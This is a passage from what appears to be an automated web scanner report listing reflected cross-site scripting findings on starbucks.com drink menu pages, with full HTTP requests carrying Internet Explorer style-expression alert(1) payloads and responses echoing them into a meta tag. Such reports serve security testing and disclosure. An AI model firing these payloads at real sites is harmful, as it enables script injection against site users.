This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/chocolate/white-hot-chocolate?5391b"style%3d"x%3aexpression(alert(1))"a19b060ce42=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:31:26 GMT Connection: close Content-Length: 41166
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/chocolate/white-hot-chocolate?5391b"style="x:expression(alert(1))"a19b060ce42=1"/> ...[SNIP]...
1.717. http://www.starbucks.com/menu/drinks/espresso/caffe-americano [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/espresso/caffe-americano
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f255"style%3d"x%3aexpression(alert(1))"4510f38bf85 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6f255"style="x:expression(alert(1))"4510f38bf85 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/espresso/caffe-americano?6f255"style%3d"x%3aexpression(alert(1))"4510f38bf85=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:24:09 GMT Connection: close Content-Length: 42932
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/caffe-americano?6f255"style="x:expression(alert(1))"4510f38bf85=1"/> ...[SNIP]...
1.718. http://www.starbucks.com/menu/drinks/espresso/caffe-latte [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/espresso/caffe-latte
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b40a7"style%3d"x%3aexpression(alert(1))"30887b94fb0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b40a7"style="x:expression(alert(1))"30887b94fb0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/espresso/caffe-latte?b40a7"style%3d"x%3aexpression(alert(1))"30887b94fb0=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:23:55 GMT Connection: close Content-Length: 42713
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/caffe-latte?b40a7"style="x:expression(alert(1))"30887b94fb0=1"/> ...[SNIP]...
1.719. http://www.starbucks.com/menu/drinks/espresso/caffe-mocha [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/espresso/caffe-mocha
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45914"style%3d"x%3aexpression(alert(1))"d584cd48a51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 45914"style="x:expression(alert(1))"d584cd48a51 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/espresso/caffe-mocha?45914"style%3d"x%3aexpression(alert(1))"d584cd48a51=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:23:49 GMT Connection: close Content-Length: 43114
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/caffe-mocha?45914"style="x:expression(alert(1))"d584cd48a51=1"/> ...[SNIP]...
1.720. http://www.starbucks.com/menu/drinks/espresso/cappuccino [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/espresso/cappuccino
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e145"style%3d"x%3aexpression(alert(1))"9afccd69e4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7e145"style="x:expression(alert(1))"9afccd69e4b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/espresso/cappuccino?7e145"style%3d"x%3aexpression(alert(1))"9afccd69e4b=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:24:17 GMT Connection: close Content-Length: 42857
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/cappuccino?7e145"style="x:expression(alert(1))"9afccd69e4b=1"/> ...[SNIP]...
1.721. http://www.starbucks.com/menu/drinks/espresso/caramel-brulee-latte [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/espresso/caramel-brulee-latte
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fbaa"style%3d"x%3aexpression(alert(1))"edc31d198d3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9fbaa"style="x:expression(alert(1))"edc31d198d3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/espresso/caramel-brulee-latte?9fbaa"style%3d"x%3aexpression(alert(1))"edc31d198d3=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:24:22 GMT Connection: close Content-Length: 43406
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/caramel-brulee-latte?9fbaa"style="x:expression(alert(1))"edc31d198d3=1"/> ...[SNIP]...
1.722. http://www.starbucks.com/menu/drinks/espresso/caramel-macchiato [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/espresso/caramel-macchiato
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46c9c"style%3d"x%3aexpression(alert(1))"2b341b0daca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 46c9c"style="x:expression(alert(1))"2b341b0daca in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/espresso/caramel-macchiato?46c9c"style%3d"x%3aexpression(alert(1))"2b341b0daca=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:25:08 GMT Connection: close Content-Length: 43191
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/caramel-macchiato?46c9c"style="x:expression(alert(1))"2b341b0daca=1"/> ...[SNIP]...
1.723. http://www.starbucks.com/menu/drinks/espresso/cinnamon-dolce-latte [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/espresso/cinnamon-dolce-latte
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20f06"style%3d"x%3aexpression(alert(1))"edbeba63995 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 20f06"style="x:expression(alert(1))"edbeba63995 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/espresso/cinnamon-dolce-latte?20f06"style%3d"x%3aexpression(alert(1))"edbeba63995=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:25:18 GMT Connection: close Content-Length: 43087
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/cinnamon-dolce-latte?20f06"style="x:expression(alert(1))"edbeba63995=1"/> ...[SNIP]...
1.724. http://www.starbucks.com/menu/drinks/espresso/eggnog-latte [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/espresso/eggnog-latte
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fbe1"style%3d"x%3aexpression(alert(1))"947cd8ab9f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5fbe1"style="x:expression(alert(1))"947cd8ab9f7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/espresso/eggnog-latte?5fbe1"style%3d"x%3aexpression(alert(1))"947cd8ab9f7=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:25:06 GMT Connection: close Content-Length: 43144
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/eggnog-latte?5fbe1"style="x:expression(alert(1))"947cd8ab9f7=1"/> ...[SNIP]...
1.725. http://www.starbucks.com/menu/drinks/espresso/espresso-con-panna [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/espresso/espresso-con-panna
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 308a1"style%3d"x%3aexpression(alert(1))"67cfbbd6d45 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 308a1"style="x:expression(alert(1))"67cfbbd6d45 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/espresso/espresso-con-panna?308a1"style%3d"x%3aexpression(alert(1))"67cfbbd6d45=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:25:10 GMT Connection: close Content-Length: 42380
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/espresso-con-panna?308a1"style="x:expression(alert(1))"67cfbbd6d45=1"/> ...[SNIP]...
1.726. http://www.starbucks.com/menu/drinks/espresso/espresso-macchiato [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/espresso/espresso-macchiato
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fec3e"style%3d"x%3aexpression(alert(1))"7a8ae9aecf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fec3e"style="x:expression(alert(1))"7a8ae9aecf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/espresso/espresso-macchiato?fec3e"style%3d"x%3aexpression(alert(1))"7a8ae9aecf=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:25:13 GMT Connection: close Content-Length: 42915
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/espresso-macchiato?fec3e"style="x:expression(alert(1))"7a8ae9aecf=1"/> ...[SNIP]...
1.727. http://www.starbucks.com/menu/drinks/espresso/espresso-shot [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/espresso/espresso-shot
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1525"style%3d"x%3aexpression(alert(1))"c72de6024ef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as c1525"style="x:expression(alert(1))"c72de6024ef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/espresso/espresso-shot?c1525"style%3d"x%3aexpression(alert(1))"c72de6024ef=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:25:07 GMT Connection: close Content-Length: 42260
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/espresso-shot?c1525"style="x:expression(alert(1))"c72de6024ef=1"/> ...[SNIP]...
1.728. http://www.starbucks.com/menu/drinks/espresso/flavored-latte [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/espresso/flavored-latte
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5dceb"style%3d"x%3aexpression(alert(1))"01f34e806e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5dceb"style="x:expression(alert(1))"01f34e806e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/espresso/flavored-latte?5dceb"style%3d"x%3aexpression(alert(1))"01f34e806e=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:25:40 GMT Connection: close Content-Length: 42615
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/flavored-latte?5dceb"style="x:expression(alert(1))"01f34e806e=1"/> ...[SNIP]...
1.729. http://www.starbucks.com/menu/drinks/espresso/gingerbread-latte [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/espresso/gingerbread-latte
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fb272"style%3d"x%3aexpression(alert(1))"511c9e6d392 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fb272"style="x:expression(alert(1))"511c9e6d392 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /menu/drinks/espresso/gingerbread-latte?fb272"style%3d"x%3aexpression(alert(1))"511c9e6d392=1 HTTP/1.1 Host: www.starbucks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 p3p: CP="CAO PSA OUR" X-Powered-By: ASP.NET Date: Tue, 08 Feb 2011 03:26:15 GMT Connection: close Content-Length: 43423
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="content ...[SNIP]... <meta property="og:url" content="http://www.starbucks.com/menu/drinks/espresso/gingerbread-latte?fb272"style="x:expression(alert(1))"511c9e6d392=1"/> ...[SNIP]...
1.730. http://www.starbucks.com/menu/drinks/espresso/iced-caffe-americano [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.starbucks.com
Path:
/menu/drinks/espresso/iced-caffe-americano
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b26f3"style%3d"x%3aexpression(alert(1))"5d8d8ff815a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b26f3"style="x:expression(alert(1))"5d8d8ff815a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
